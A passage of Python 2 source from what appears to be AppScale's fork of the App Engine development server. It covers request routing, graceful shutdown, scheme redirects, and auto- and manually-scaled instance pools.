self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
# AppScale: Keeps track of active requests in case of shutdown.
# Indicates that the instance should refuse future requests.
self.sigterm_sent = False
# Handles request count and sigterm flag mutations.
self.graceful_shutdown_lock = threading.Lock()
# Keeps track of how many requests the instance is serving.
self.request_count = 0
# End AppScale.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
# AppScale: Check if the instance should be shutting down before handling
# request.
def _handle_request(self, environ, start_response, *args, **kwargs):
""" A _handle_request wrapper that keeps track of active requests.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
with self.graceful_shutdown_lock:
if self.sigterm_sent:
start_response('503 Service Unavailable',
[('Content-Type', 'text/plain')])
return ['This instance is shutting down']
self.request_count += 1
try:
return self._handle_request_impl(environ, start_response, *args,
**kwargs)
finally:
with self.graceful_shutdown_lock:
self.request_count -= 1
# End AppScale.
def _handle_request_impl(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
try:
environ['SERVER_PORT'] = environ['HTTP_HOST'].split(':')[1]
except IndexError:
scheme = environ.get('HTTP_X_FORWARDED_PROTO', 'http')
if scheme == 'http':
environ['SERVER_PORT'] = 80
else:
environ['SERVER_PORT'] = 443
# AppScale: Modify environment based on proxy headers.
x_proto = environ.get('HTTP_X_FORWARDED_PROTO')
if x_proto:
environ['wsgi.url_scheme'] = x_proto
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], environ['SERVER_PORT'])
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
# AppScale: Reject requests with the wrong scheme.
redirect_response = self._handle_redirect(
handler, environ, wrapped_start_response)
if redirect_response is not None:
return redirect_response
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _handle_redirect(self, handler, environ, start_response):
""" AppScale: Reject requests with the wrong scheme. """
# Only reject requests that come through nginx.
if 'HTTP_X_FORWARDED_PROTO' not in environ:
return
# Ignore handlers that the user did not configure.
if not isinstance(handler, url_handler.UserConfiguredURLHandler):
return
scheme = environ['HTTP_X_FORWARDED_PROTO']
expected_scheme = scheme
redirect_host = environ['HTTP_HOST']
if handler._url_map.secure == 'always':
expected_scheme = 'https'
elif handler._url_map.secure == 'never':
expected_scheme = 'http'
if scheme == expected_scheme:
return
redirect_port = environ['HTTP_X_REDIRECT_HTTP_PORT'] \
if expected_scheme == 'http' else environ['HTTP_X_REDIRECT_HTTPS_PORT']
redirect_host = '{}:{}'.format(environ['HTTP_HOST'].split(':')[0],
redirect_port)
new_location = ''.join([expected_scheme, '://', redirect_host,
environ.get('REQUEST_URI', '/')])
start_response('302 Moved Temporarily', [('Location', new_location)])
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
util.put_headers_in_environ(headers, environ)
if fake_login:
environ[constants.FAKE_IS_ADMIN_HEADER] = login.fake_admin()
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
elif constants.FAKE_LOGGED_IN_HEADER in environ:
del environ[constants.FAKE_LOGGED_IN_HEADER]
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
